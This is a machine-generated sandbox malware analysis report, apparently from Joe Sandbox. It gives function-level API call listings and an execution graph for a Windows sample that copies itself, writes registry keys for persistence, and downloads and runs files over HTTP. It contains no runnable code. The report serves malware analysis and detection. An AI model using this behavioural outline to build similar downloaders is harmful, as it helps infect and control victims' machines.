                                                                                                                                    • Instruction Fuzzy Hash: BD01F7356423049FC3209F26EC44ADB77F8AF49712B04443EE50693650DB34F545DB28
                                                                                                                                    Function 0040E400 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 101COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 0040E640: memset.NTDLL ref: 0040E668
                                                                                                                                      • Part of subcall function 0040E640: InternetCrackUrlA.WININET(0040E119,00000000,10000000,0000003C), ref: 0040E6B8
                                                                                                                                      • Part of subcall function 0040E640: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040E6C8
                                                                                                                                      • Part of subcall function 0040E640: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040E701
                                                                                                                                      • Part of subcall function 0040E640: HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,00000000,00000000), ref: 0040E737
                                                                                                                                      • Part of subcall function 0040E640: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040E75F
                                                                                                                                      • Part of subcall function 0040E640: InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040E7A8
                                                                                                                                      • Part of subcall function 0040E640: InternetCloseHandle.WININET(00000000), ref: 0040E837
                                                                                                                                      • Part of subcall function 0040E530: SysAllocString.OLEAUT32(00000000), ref: 0040E55E
                                                                                                                                      • Part of subcall function 0040E530: CoCreateInstance.OLE32(00413000,00000000,00004401,00412FF0,00000000), ref: 0040E586
                                                                                                                                      • Part of subcall function 0040E530: SysFreeString.OLEAUT32(00000000), ref: 0040E621
                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040E4DB
                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040E4E5
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2003370192.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.2003359211.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003382841.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003395330.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Internet$String$Free$HttpOpenRequest$AllocCloseConnectCrackCreateFileHandleInstanceReadSendmemset
                                                                                                                                    • String ID: %S%S
                                                                                                                                    • API String ID: 1017111014-3267608656
                                                                                                                                    • Opcode ID: f492fb3745eed00b8c6f39d02d898e4ad1aa2c93a055282723199110ccf6299a
                                                                                                                                    • Instruction ID: e5c4592a6bf7e21b90caaa4e382eb9027ff93744cff569d410d2f086dfa1b48d
                                                                                                                                    • Opcode Fuzzy Hash: f492fb3745eed00b8c6f39d02d898e4ad1aa2c93a055282723199110ccf6299a
                                                                                                                                    • Instruction Fuzzy Hash: 41415CB5D00209AFCB04DFE5C885AEFB7B5BF48304F104929E605B7390E738AA41CBA1

                                                                                                                                    Execution Graph

                                                                                                                                    Execution Coverage:0.1%
                                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                                    Signature Coverage:0%
                                                                                                                                    Total number of Nodes:1500
                                                                                                                                    Total number of Limit Nodes:1
                                                                                                                                    execution_graph 4451 407940 Sleep CreateMutexA GetLastError 4452 407976 ExitProcess 4451->4452 4453 40797e 6 API calls 4451->4453 4454 407d31 Sleep ShellExecuteW ShellExecuteW RegOpenKeyExW 4453->4454 4455 407a23 4453->4455 4457 407dcb RegOpenKeyExW 4454->4457 4458 407d9f RegSetValueExW RegCloseKey 4454->4458 4530 40f1b0 GetLocaleInfoA strcmp 4455->4530 4459 407e24 RegOpenKeyExW 4457->4459 4460 407df8 RegSetValueExW RegCloseKey 4457->4460 4458->4457 4462 407e51 RegSetValueExW RegCloseKey 4459->4462 4463 407e7d RegOpenKeyExW 4459->4463 4460->4459 4462->4463 4466 407ed6 RegOpenKeyExW 4463->4466 4467 407eaa RegSetValueExW RegCloseKey 4463->4467 4464 407a30 ExitProcess 4465 407a38 ExpandEnvironmentStringsW wsprintfW CopyFileW 4468 407b36 Sleep wsprintfW CopyFileW 4465->4468 4469 407a8c SetFileAttributesW RegOpenKeyExW 4465->4469 4470 407f03 RegSetValueExW RegCloseKey 4466->4470 4471 407f2f RegOpenKeyExW 4466->4471 4467->4466 4473 407c28 Sleep ExpandEnvironmentStringsW wsprintfW CopyFileW 4468->4473 4474 407b7e SetFileAttributesW RegOpenKeyExW 4468->4474 4469->4468 4472 407ac8 wcslen RegSetValueExW 4469->4472 4470->4471 4476 407f88 RegOpenKeyExW 4471->4476 4477 407f5c RegSetValueExW RegCloseKey 4471->4477 4478 407b29 RegCloseKey 4472->4478 4479 407afd RegCloseKey 4472->4479 4473->4454 4475 407c87 SetFileAttributesW RegOpenKeyExW 4473->4475 4474->4473 4480 407bba wcslen RegSetValueExW 4474->4480 4475->4454 4483 407cc3 wcslen RegSetValueExW 4475->4483 4485 407fb5 RegSetValueExW RegSetValueExW RegSetValueExW RegCloseKey 4476->4485 4486 40801f RegOpenKeyExW 4476->4486 4477->4476 4478->4468 4532 40f400 memset memset CreateProcessW 4479->4532 4481 407c1b RegCloseKey 4480->4481 4482 407bef RegCloseKey 4480->4482 4481->4473 4487 40f400 6 API calls 4482->4487 4488 407d24 RegCloseKey 4483->4488 4489 407cf8 RegCloseKey 4483->4489 4485->4486 4491 408050 RegSetValueExW RegSetValueExW RegSetValueExW RegSetValueExW RegCloseKey 4486->4491 4492 4080d9 RegOpenKeyExW 4486->4492 4493 407c08 4487->4493 4488->4454 4494 40f400 6 API calls 4489->4494 4491->4492 4496 4081f0 RegOpenKeyExW 4492->4496 4497 40810a 8 API calls 4492->4497 4493->4481 4500 407c13 ExitProcess 4493->4500 4501 407d11 4494->4501 4495 407b21 ExitProcess 4498 408221 8 API calls 4496->4498 4499 408307 Sleep 4496->4499 4497->4496 4498->4499 4537 40d180 4499->4537 4501->4488 4503 407d1c ExitProcess 4501->4503 4505 40848e 4506 408322 9 API calls 4540 405c00 InitializeCriticalSection CreateFileW 4506->4540 5363 4077f0 4506->5363 5370 4058c0 4506->5370 5379 406f70 Sleep GetModuleFileNameW 4506->5379 4512 4083d7 CreateEventA 4572 40c8b0 4512->4572 4521 40dbe0 17 API calls 4522 408438 4521->4522 4523 40dbe0 17 API calls 4522->4523 4524 408453 4523->4524 4525 40dbe0 17 API calls 4524->4525 4526 40846f 4525->4526 4617 40dd50 GetCurrentThread GetThreadPriority GetCurrentThread SetThreadPriority 4526->4617 4528 408480 4626 40de90 4528->4626 4531 407a28 4530->4531 4531->4464 4531->4465 4533 40f471 ShellExecuteW 4532->4533 4534 40f462 Sleep 4532->4534 4535 407b16 4533->4535 4536 40f497 Sleep 4533->4536 4534->4535 4535->4478 4535->4495 4536->4535 4635 40d150 4537->4635 4541 405d25 4540->4541 4542 405c38 CreateFileMappingW 4540->4542 4554 40e0c0 CoInitializeEx 4541->4554 4543 405c59 MapViewOfFile 4542->4543 4544 405d1b CloseHandle 4542->4544 4545 405d11 CloseHandle 4543->4545 4546 405c78 GetFileSize 4543->4546 4544->4541 4545->4544 4550 405c8d 4546->4550 4547 405d07 UnmapViewOfFile 4547->4545 4548 405c9c 4548->4547 4550->4547 4550->4548 4551 405ccc 4550->4551 4764 40d1d0 4550->4764 4771 405d30 4550->4771 4552 40ab60 _invalid_parameter 3 API calls 4551->4552 4552->4548 5077 40e190 socket 4554->5077 4556 40e168 5121 40ac80 4556->5121 4559 40e0e0 4559->4556 4560 4083d2 4559->4560 4561 40e12a 4559->4561 5087 40e400 4559->5087 4567 407390 CoInitializeEx SysAllocString 4560->4567 5102 40b430 htons 4561->5102 4566 40eef0 24 API calls 4566->4556 4568 4073b2 4567->4568 4569 4073c8 CoUninitialize 4567->4569 5266 4073e0 4568->5266 4569->4512 5275 40c870 4572->5275 4575 40c870 3 API calls 4576 40c8ce 4575->4576 4577 40c870 3 API calls 4576->4577 4578 40c8de 4577->4578 4579 40c870 3 API calls 4578->4579 4580 4083ef 4579->4580 4581 40dbb0 4580->4581 4582 40a740 7 API calls 4581->4582 4583 40dbbb 4582->4583 4584 4083f9 4583->4584 4585 40dbc7 InitializeCriticalSection 4583->4585 4586 40bc70 InitializeCriticalSection 4584->4586 4585->4584 4591 40bc8a 4586->4591 4587 40bcb9 CreateFileW 4589 40bce0 CreateFileMappingW 4587->4589 4590 40bda2 4587->4590 4593 40bd01 MapViewOfFile 4589->4593 4594 40bd98 CloseHandle 4589->4594 5331 40b510 EnterCriticalSection 4590->5331 4591->4587 5282 40df20 NtQuerySystemTime RtlTimeToSecondsSince1980 4591->5282 5283 40b850 4591->5283 4595 40bd1c GetFileSize 4593->4595 4596 40bd8e CloseHandle 4593->4596 4594->4590 4603 40bd3b 4595->4603 4596->4594 4598 40bda7 4599 40dbe0 17 API calls 4598->4599 4600 408403 4599->4600 4605 40dbe0 4600->4605 4601 40bd84 UnmapViewOfFile 4601->4596 4603->4601 4604 40b850 32 API calls 4603->4604 5330 40df20 NtQuerySystemTime RtlTimeToSecondsSince1980 4603->5330 4604->4603 4606 40dbf7 EnterCriticalSection 4605->4606 4607 40841c 4605->4607 5358 40dcd0 4606->5358 4607->4521 4610 40dcbb LeaveCriticalSection 4610->4607 4611 40a990 9 API calls 4612 40dc39 4611->4612 4612->4610 4613 40dc4b CreateThread 4612->4613 4613->4610 4614 40dc6e 4613->4614 4615 40dc92 GetCurrentProcess GetCurrentProcess DuplicateHandle 4614->4615 4616 40dcb4 4614->4616 4615->4616 4616->4610 4618 40dd86 InterlockedExchangeAdd 4617->4618 4619 40de69 GetCurrentThread SetThreadPriority 4617->4619 4618->4619 4620 40dda0 4618->4620 4619->4528 4620->4619 4621 40ddb9 EnterCriticalSection 4620->4621 4622 40de27 LeaveCriticalSection 4620->4622 4623 40de03 WaitForSingleObject 4620->4623 4624 40de3e 4620->4624 4625 40de5c Sleep 4620->4625 4621->4620 4622->4620 4622->4624 4623->4620 4624->4619 4625->4620 4627 40df12 4626->4627 4628 40de9c EnterCriticalSection 4626->4628 4627->4505 4629 40deb8 4628->4629 4630 40dee0 LeaveCriticalSection DeleteCriticalSection 4629->4630 4631 40decb CloseHandle 4629->4631 4632 40ab60 _invalid_parameter 3 API calls 4630->4632 4631->4629 4633 40df06 4632->4633 4634 40ab60 _invalid_parameter 3 API calls 4633->4634 4634->4627 4638 40cda0 4635->4638 4639 40cdd3 4638->4639 4640 40cdbe 4638->4640 4641 408317 4639->4641 4670 40cf80 4639->4670 4644 40ce00 4640->4644 4641->4505 4641->4506 4645 40ceb2 4644->4645 4646 40ce29 4644->4646 4648 40a740 7 API calls 4645->4648 4669 40ceaa 4645->4669 4646->4669 4704 40a740 4646->4704 4650 40ced8 4648->4650 4652 402420 7 API calls 4650->4652 4650->4669 4654 40cf05 4652->4654 4656 4024e0 10 API calls 4654->4656 4658 40cf1f 4656->4658 4657 40ce7f 4659 402420 7 API calls 4657->4659 4661 402420 7 API calls 4658->4661 4660 40ce90 4659->4660 4662 4024e0 10 API calls 4660->4662 4663 40cf30 4661->4663 4662->4669 4664 4024e0 10 API calls 4663->4664 4665 40cf4a 4664->4665 4666 402420 7 API calls 4665->4666 4667 40cf5b 4666->4667 4668 4024e0 10 API calls 4667->4668 4668->4669 4669->4641 4671 40cfa9 4670->4671 4672 40d05a 4670->4672 4673 40d052 4671->4673 4674 40a740 7 API calls 4671->4674 4672->4673 4676 40a740 7 API calls 4672->4676 4673->4641 4675 40cfbf 4674->4675 4675->4673 4678 402420 7 API calls 4675->4678 4677 40d07e 4676->4677 4677->4673 4680 402420 7 API calls 4677->4680 4679 40cfe3 4678->4679 4681 40a740 7 API calls 4679->4681 4682 40d0a2 4680->4682 4683 40cff2 4681->4683 4684 40a740 7 API calls 4682->4684 4685 4024e0 10 API calls 4683->4685 4686 40d0b1 4684->4686 4687 40d01b 4685->4687 4688 4024e0 10 API calls 4686->4688 4689 40ab60 _invalid_parameter 3 API calls 4687->4689 4690 40d0da 4688->4690 4691 40d027 4689->4691 4692 40ab60 _invalid_parameter 3 API calls 4690->4692 4693 402420 7 API calls 4691->4693 4694 40d0e6 4692->4694 4695 40d038 4693->4695 4696 402420 7 API calls 4694->4696 4697 4024e0 10 API calls 4695->4697 4698 40d0f7 4696->4698 4697->4673 4699 4024e0 10 API calls 4698->4699 4700 40d111 4699->4700 4701 402420 7 API calls 4700->4701 4702 40d122 4701->4702 4703 4024e0 10 API calls 4702->4703 4703->4673 4715 40a760 4704->4715 4707 402420 4736 40a950 4707->4736 4712 4024e0 4743 402540 4712->4743 4714 4024ff __aligned_recalloc_base 4714->4657 4724 40a800 GetCurrentProcessId 4715->4724 4717 40a76b 4718 40a777 _invalid_parameter 4717->4718 4725 40a820 4717->4725 4720 40a74e 4718->4720 4721 40a792 HeapAlloc 4718->4721 4720->4669 4720->4707 4721->4720 4722 40a7b9 _invalid_parameter 4721->4722 4722->4720 4723 40a7d4 memset 4722->4723 4723->4720 4724->4717 4733 40a800 GetCurrentProcessId 4725->4733 4727 40a829 4728 40a846 HeapCreate 4727->4728 4734 40a890 GetProcessHeaps 4727->4734 4730 40a860 HeapSetInformation GetCurrentProcessId 4728->4730 4731 40a887 4728->4731 4730->4731 4731->4718 4733->4727 4735 40a83c 4734->4735 4735->4728 4735->4731 4737 40a760 _invalid_parameter 7 API calls 4736->4737 4738 40242b 4737->4738 4739 402820 4738->4739 4740 40282a 4739->4740 4741 40a950 _invalid_parameter 7 API calls 4740->4741 4742 402438 4741->4742 4742->4712 4744 402551 4743->4744 4745 40258e 4743->4745 4744->4714 4745->4744 4746 40a950 _invalid_parameter 7 API calls 4745->4746 4748 4025b2 _invalid_parameter 4746->4748 4747 4025e2 memcpy 4749 402606 _invalid_parameter 4747->4749 4748->4747 4753 40ab60 4748->4753 4751 40ab60 _invalid_parameter 3 API calls 4749->4751 4751->4744 4760 40a800 GetCurrentProcessId 4753->4760 4755 40ab6b 4756 4025df 4755->4756 4761 40aaa0 4755->4761 4756->4747 4759 40ab87 HeapFree 4759->4756 4760->4755 4762 40aad0 HeapValidate 4761->4762 4763 40aaf0 4761->4763 4762->4763 4763->4756 4763->4759 4781 40abd0 4764->4781 4769 40ab60 _invalid_parameter 3 API calls 4770 40d211 4769->4770 4770->4550 4994 40a990 4771->4994 4774 405d6a memcpy 4775 40abd0 8 API calls 4774->4775 4776 405da1 4775->4776 5004 40cb40 4776->5004 4779 405e28 4779->4550 4782 40abfd 4781->4782 4783 40a950 _invalid_parameter 7 API calls 4782->4783 4784 40ac12 4782->4784 4785 40ac14 memcpy 4782->4785 4783->4782 4784->4770 4786 40c6e0 4784->4786 4785->4782 4790 40c6ea 4786->4790 4788 40c709 4788->4769 4788->4770 4790->4788 4791 40c721 memcmp 4790->4791 4792 40c748 4790->4792 4794 40ab60 _invalid_parameter 3 API calls 4790->4794 4795 40cbd0 4790->4795 4809 4084a0 4790->4809 4791->4790 4793 40ab60 _invalid_parameter 3 API calls 4792->4793 4793->4788 4794->4790 4796 40cbdf _invalid_parameter 4795->4796 4797 40a950 _invalid_parameter 7 API calls 4796->4797 4799 40cbe9 4796->4799 4798 40cc78 4797->4798 4798->4799 4800 402420 7 API calls 4798->4800 4799->4790 4801 40cc8d 4800->4801 4802 402420 7 API calls 4801->4802 4803 40cc95 4802->4803 4805 40cced _invalid_parameter 4803->4805 4812 40cd40 4803->4812 4817 402470 4805->4817 4808 402470 3 API calls 4808->4799 4925 40a6c0 4809->4925 4813 4024e0 10 API calls 4812->4813 4814 40cd54 4813->4814 4823 4026f0 4814->4823 4816 40cd6c 4816->4803 4819 402484 _invalid_parameter 4817->4819 4820 4024ce 4817->4820 4818 40ab60 _invalid_parameter 3 API calls 4818->4820 4821 40ab60 _invalid_parameter 3 API calls 4819->4821 4822 4024ac 4819->4822 4820->4808 4821->4822 4822->4818 4826 402710 4823->4826 4825 40270a 4825->4816 4827 402724 4826->4827 4828 402540 __aligned_recalloc_base 10 API calls 4827->4828 4829 40276d 4828->4829 4830 402540 __aligned_recalloc_base 10 API calls 4829->4830 4831 40277d 4830->4831 4832 402540 __aligned_recalloc_base 10 API calls 4831->4832 4833 40278d 4832->4833 4834 402540 __aligned_recalloc_base 10 API calls 4833->4834 4835 40279d 4834->4835 4836 4027a6 4835->4836 4837 4027cf 4835->4837 4841 403e20 4836->4841 4858 403df0 4837->4858 4840 4027c7 __aligned_recalloc_base 4840->4825 4842 402820 _invalid_parameter 7 API calls 4841->4842 4843 403e37 4842->4843 4844 402820 _invalid_parameter 7 API calls 4843->4844 4845 403e46 4844->4845 4846 402820 _invalid_parameter 7 API calls 4845->4846 4847 403e55 4846->4847 4848 402820 _invalid_parameter 7 API calls 4847->4848 4849 403e64 _invalid_parameter __aligned_recalloc_base 4848->4849 4852 40400f _invalid_parameter 4849->4852 4861 402850 4849->4861 4851 402850 _invalid_parameter 3 API calls 4851->4852 4852->4851 4853 404035 _invalid_parameter 4852->4853 4854 402850 _invalid_parameter 3 API calls 4853->4854 4855 40405b _invalid_parameter 4853->4855 4854->4853 4856 402850 _invalid_parameter 3 API calls 4855->4856 4857 404081 4855->4857 4856->4855 4857->4840 4865 404090 4858->4865 4860 403e0c 4860->4840 4862 402866 4861->4862 4863 40285b 4861->4863 4862->4849 4864 40ab60 _invalid_parameter 3 API calls 4863->4864 4864->4862 4866 4040a6 _invalid_parameter 4865->4866 4867 4040dd 4866->4867 4869 4040b8 _invalid_parameter 4866->4869 4872 404103 4866->4872 4895 403ca0 4867->4895 4869->4860 4870 40413d 4905 404680 4870->4905 4871 40415e 4874 402820 _invalid_parameter 7 API calls 4871->4874 4872->4870 4872->4871 4875 40416f 4874->4875 4876 402820 _invalid_parameter 7 API calls 4875->4876 4877 40417e 4876->4877 4878 402820 _invalid_parameter 7 API calls 4877->4878 4879 40418d 4878->4879 4880 402820 _invalid_parameter 7 API calls 4879->4880 4881 40419c 4880->4881 4918 403d70 4881->4918 4883 402820 _invalid_parameter 7 API calls 4884 4041ca _invalid_parameter 4883->4884 4884->4883 4887 404284 _invalid_parameter __aligned_recalloc_base 4884->4887 4885 402850 _invalid_parameter 3 API calls 4885->4887 4886 4045a3 _invalid_parameter 4888 402850 _invalid_parameter 3 API calls 4886->4888 4889 4045c9 _invalid_parameter 4886->4889 4887->4885 4887->4886 4888->4886 4890 402850 _invalid_parameter 3 API calls 4889->4890 4891 4045ef _invalid_parameter 4889->4891 4890->4889 4892 402850 _invalid_parameter 3 API calls 4891->4892 4893 404615 _invalid_parameter 4891->4893 4892->4891 4893->4869 4894 402850 _invalid_parameter 3 API calls 4893->4894 4894->4893 4896 403cae 4895->4896 4897 402820 _invalid_parameter 7 API calls 4896->4897 4898 403ccb 4897->4898 4899 402820 _invalid_parameter 7 API calls 4898->4899 4900 403cda _invalid_parameter 4899->4900 4901 402850 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4900->4901 4902 403d3a _invalid_parameter 4900->4902 4901->4900 4903 402850 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4902->4903 4904 403d60 4902->4904 4903->4902 4904->4869 4906 402820 _invalid_parameter 7 API calls 4905->4906 4907 404697 4906->4907 4908 402820 _invalid_parameter 7 API calls 4907->4908 4909 4046a6 4908->4909 4910 402820 _invalid_parameter 7 API calls 4909->4910 4917 4046b5 _invalid_parameter __aligned_recalloc_base 4910->4917 4911 402850 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4911->4917 4912 404841 _invalid_parameter 4913 402850 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4912->4913 4914 404867 _invalid_parameter 4912->4914 4913->4912 4915 402850 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4914->4915 4916 40488d 4914->4916 4915->4914 4916->4869 4917->4911 4917->4912 4919 402820 _invalid_parameter 7 API calls 4918->4919 4920 403d7f _invalid_parameter 4919->4920 4921 403ca0 _invalid_parameter 9 API calls 4920->4921 4922 403db8 _invalid_parameter 4921->4922 4923 402850 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4922->4923 4924 403de3 4922->4924 4923->4922 4924->4884 4926 40a6d2 4925->4926 4929 40a620 4926->4929 4930 40a950 _invalid_parameter 7 API calls 4929->4930 4937 40a630 4930->4937 4933 40ab60 _invalid_parameter 3 API calls 4935 4084bf 4933->4935 4934 40a66c 4934->4933 4935->4790 4937->4934 4937->4935 4938 409b50 4937->4938 4945 40a140 4937->4945 4950 40a510 4937->4950 4939 409b63 4938->4939 4944 409b59 4938->4944 4940 409ba6 memset 4939->4940 4939->4944 4941 409bc7 4940->4941 4940->4944 4942 409bcd memcpy 4941->4942 4941->4944 4958 409920 4942->4958 4944->4937 4946 40a14d 4945->4946 4947 40a157 4945->4947 4946->4937 4947->4946 4948 40a24f memcpy 4947->4948 4963 409e70 4947->4963 4948->4947 4953 40a526 4950->4953 4956 40a51c 4950->4956 4951 409e70 64 API calls 4952 40a5a7 4951->4952 4954 409920 6 API calls 4952->4954 4952->4956 4953->4951 4953->4956 4955 40a5c6 4954->4955 4955->4956 4957 40a5db memcpy 4955->4957 4956->4937 4957->4956 4959 40996e 4958->4959 4960 40992e 4958->4960 4959->4944 4960->4959 4962 409860 6 API calls 4960->4962 4962->4960 4965 409e8a 4963->4965 4966 409e80 4963->4966 4965->4966 4973 409cb0 4965->4973 4966->4947 4968 409fc8 memcpy 4968->4966 4970 409fe7 memcpy 4971 40a111 4970->4971 4972 409e70 62 API calls 4971->4972 4972->4966 4974 409cbd 4973->4974 4975 409cc7 4973->4975 4974->4966 4974->4968 4974->4970 4975->4974 4976 409d50 4975->4976 4978 409d55 4975->4978 4979 409d38 4975->4979 4984 409610 4976->4984 4980 409920 6 API calls 4978->4980 4982 409920 6 API calls 4979->4982 4980->4976 4982->4976 4983 409dfc memset 4983->4974 4985 40961f 4984->4985 4986 409629 4984->4986 4985->4974 4985->4983 4986->4985 4987 4094e0 9 API calls 4986->4987 4988 409722 4987->4988 4989 40a950 _invalid_parameter 7 API calls 4988->4989 4990 409771 4989->4990 4990->4985 4991 409350 46 API calls 4990->4991 4992 40979e 4991->4992 4993 40ab60 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4992->4993 4993->4985 5013 40a800 GetCurrentProcessId 4994->5013 4996 40a99b 4997 40a820 _invalid_parameter 5 API calls 4996->4997 5002 40a9a7 _invalid_parameter 4996->5002 4997->5002 4998 405d55 4998->4774 4998->4779 4999 40aa50 HeapAlloc 4999->5002 5000 40aa1a HeapReAlloc 5000->5002 5001 40aaa0 _invalid_parameter HeapValidate 5001->5002 5002->4998 5002->4999 5002->5000 5002->5001 5003 40ab60 _invalid_parameter 3 API calls 5002->5003 5003->5002 5007 40cb4b 5004->5007 5005 40a950 _invalid_parameter 7 API calls 5005->5007 5006 405ded 5006->4779 5008 4076c0 5006->5008 5007->5005 5007->5006 5009 40a950 _invalid_parameter 7 API calls 5008->5009 5010 4076d0 5009->5010 5011 407717 5010->5011 5012 4076dc memcpy CreateThread CloseHandle 5010->5012 5011->4779 5012->5011 5014 407720 GetTickCount srand rand Sleep 5012->5014 5013->4996 5015 407757 5014->5015 5016 4077ad 5014->5016 5017 4077ab 5015->5017 5019 407766 StrChrA 5015->5019 5024 40f560 9 API calls 5015->5024 5016->5017 5020 40f560 63 API calls 5016->5020 5018 40ab60 _invalid_parameter 3 API calls 5017->5018 5021 4077d8 5018->5021 5019->5015 5020->5017 5025 40f623 InternetOpenUrlW 5024->5025 5026 40f78e InternetCloseHandle Sleep 5024->5026 5027 40f781 InternetCloseHandle 5025->5027 5028 40f652 CreateFileW 5025->5028 5029 40f7b5 6 API calls 5026->5029 5030 407795 Sleep 5026->5030 5027->5026 5031 40f681 InternetReadFile 5028->5031 5032 40f774 CloseHandle 5028->5032 5029->5030 5033 40f831 wsprintfW DeleteFileW Sleep 5029->5033 5030->5015 5034 40f6d4 CloseHandle wsprintfW DeleteFileW Sleep 5031->5034 5035 40f6a5 5031->5035 5032->5027 5036 40f240 21 API calls 5033->5036 5052 40f240 CreateFileW 5034->5052 5035->5034 5037 40f6ae WriteFile 5035->5037 5039 40f871 5036->5039 5037->5031 5041 40f87b Sleep 5039->5041 5042 40f8af DeleteFileW 5039->5042 5045 40f400 6 API calls 5041->5045 5042->5030 5043 40f767 DeleteFileW 5043->5032 5044 40f72b Sleep 5046 40f400 6 API calls 5044->5046 5047 40f892 5045->5047 5048 40f742 5046->5048 5047->5030 5050 40f8a5 ExitProcess 5047->5050 5049 40f75e 5048->5049 5051 40f756 ExitProcess 5048->5051 5049->5032 5053 40f285 CreateFileMappingW 5052->5053 5054 40f39a 5052->5054 5055 40f390 CloseHandle 5053->5055 5056 40f2a6 MapViewOfFile 5053->5056 5057 40f3a0 CreateFileW 5054->5057 5058 40f3f1 5054->5058 5055->5054 5059 40f2c5 GetFileSize 5056->5059 5060 40f386 CloseHandle 5056->5060 5061 40f3c2 WriteFile CloseHandle 5057->5061 5062 40f3e8 5057->5062 5058->5043 5058->5044 5063 40f2e1 5059->5063 5064 40f37c UnmapViewOfFile 5059->5064 5060->5055 5061->5062 5065 40ab60 _invalid_parameter 3 API calls 5062->5065 5074 40d1a0 5063->5074 5064->5060 5065->5058 5068 40cb40 7 API calls 5069 40f330 5068->5069 5069->5064 5070 40f34d memcmp 5069->5070 5070->5064 5071 40f369 5070->5071 5072 40ab60 _invalid_parameter 3 API calls 5071->5072 5073 40f372 5072->5073 5073->5064 5075 40cbd0 10 API calls 5074->5075 5076 40d1c4 5075->5076 5076->5064 5076->5068 5078 40e2ee 5077->5078 5079 40e1bd htons inet_addr setsockopt 5077->5079 5078->4559 5080 40b430 8 API calls 5079->5080 5081 40e236 bind lstrlenA sendto ioctlsocket 5080->5081 5085 40e28b 5081->5085 5082 40e2b2 5134 40b4f0 shutdown closesocket 5082->5134 5085->5082 5086 40a990 9 API calls 5085->5086 5125 40e310 5085->5125 5086->5085 5141 40e640 memset InternetCrackUrlA InternetOpenA 5087->5141 5091 40ab60 _invalid_parameter 3 API calls 5092 40e51e 5091->5092 5092->4559 5096 40e4eb 5096->5091 5099 40e4e1 SysFreeString 5099->5096 5248 40b3f0 inet_addr 5102->5248 5105 40b48c connect 5106 40b4a0 getsockname 5105->5106 5107 40b4d4 5105->5107 5106->5107 5251 40b4f0 shutdown closesocket 5107->5251 5109 40b4dd 5110 40eef0 5109->5110 5252 40b3d0 inet_ntoa 5110->5252 5112 40ef06 5113 40d470 11 API calls 5112->5113 5114 40ef25 5113->5114 5120 40e14c 5114->5120 5253 40ef70 memset InternetCrackUrlA InternetOpenA 5114->5253 5117 40ab60 _invalid_parameter 3 API calls 5119 40ef5c 5117->5119 5118 40ab60 _invalid_parameter 3 API calls 5118->5120 5119->5118 5120->4566 5124 40ac84 5121->5124 5122 40ac8a 5122->4560 5123 40ab60 GetCurrentProcessId HeapValidate HeapFree _invalid_parameter 5123->5124 5124->5122 5124->5123 5126 40e32c 5125->5126 5127 40e3f4 5126->5127 5128 40e348 recvfrom 5126->5128 5127->5085 5129 40e376 StrCmpNIA 5128->5129 5130 40e369 Sleep 5128->5130 5129->5126 5131 40e395 StrStrIA 5129->5131 5130->5126 5131->5126 5132 40e3b6 StrChrA 5131->5132 5135 40d320 5132->5135 5134->5078 5136 40d32b 5135->5136 5137 40d331 lstrlenA 5136->5137 5138 40d344 5136->5138 5139 40a950 _invalid_parameter 7 API calls 5136->5139 5140 40d360 memcpy 5136->5140 5137->5136 5137->5138 5138->5126 5139->5136 5140->5136 5140->5138 5142 40e6e1 InternetConnectA 5141->5142 5143 40e41a 5141->5143 5144 40e84a InternetCloseHandle 5142->5144 5145 40e71a HttpOpenRequestA 5142->5145 5143->5092 5154 40e530 5143->5154 5144->5143 5146 40e750 HttpSendRequestA 5145->5146 5147 40e83d InternetCloseHandle 5145->5147 5148 40e830 InternetCloseHandle 5146->5148 5150 40e76d 5146->5150 5147->5144 5148->5147 5149 40e78e InternetReadFile 5149->5150 5151 40e7bb 5149->5151 5150->5149 5150->5151 5152 40a990 9 API calls 5150->5152 5151->5148 5153 40e7d6 memcpy 5152->5153 5153->5150 5183 40d250 5154->5183 5157 40e433 5157->5096 5164 40eea0 5157->5164 5158 40e55a SysAllocString 5159 40e571 CoCreateInstance 5158->5159 5160 40e627 5158->5160 5161 40e61d SysFreeString 5159->5161 5163 40e596 5159->5163 5162 40ab60 _invalid_parameter 3 API calls 5160->5162 5161->5160 5162->5157 5163->5161 5200 40e9f0 5164->5200 5167 40e870 5205 40ecc0 5167->5205 5172 40ee20 6 API calls 5173 40e8c7 5172->5173 5179 40e4b2 5173->5179 5222 40eae0 5173->5222 5176 40e8ff 5176->5179 5227 40e990 5176->5227 5177 40eae0 6 API calls 5177->5176 5179->5099 5180 40d470 5179->5180 5243 40d3e0 5180->5243 5187 40d25d 5183->5187 5184 40d263 lstrlenA 5184->5187 5189 40d276 5184->5189 5186 40a950 _invalid_parameter 7 API calls 5186->5187 5187->5184 5187->5186 5187->5189 5190 40ab60 _invalid_parameter 3 API calls 5187->5190 5191 405740 5187->5191 5195 4056f0 5187->5195 5189->5157 5189->5158 5190->5187 5192 405757 MultiByteToWideChar 5191->5192 5193 40574a lstrlenA 5191->5193 5194 40577c 5192->5194 5193->5192 5194->5187 5198 4056fb 5195->5198 5196 405701 lstrlenA 5196->5198 5197 405740 2 API calls 5197->5198 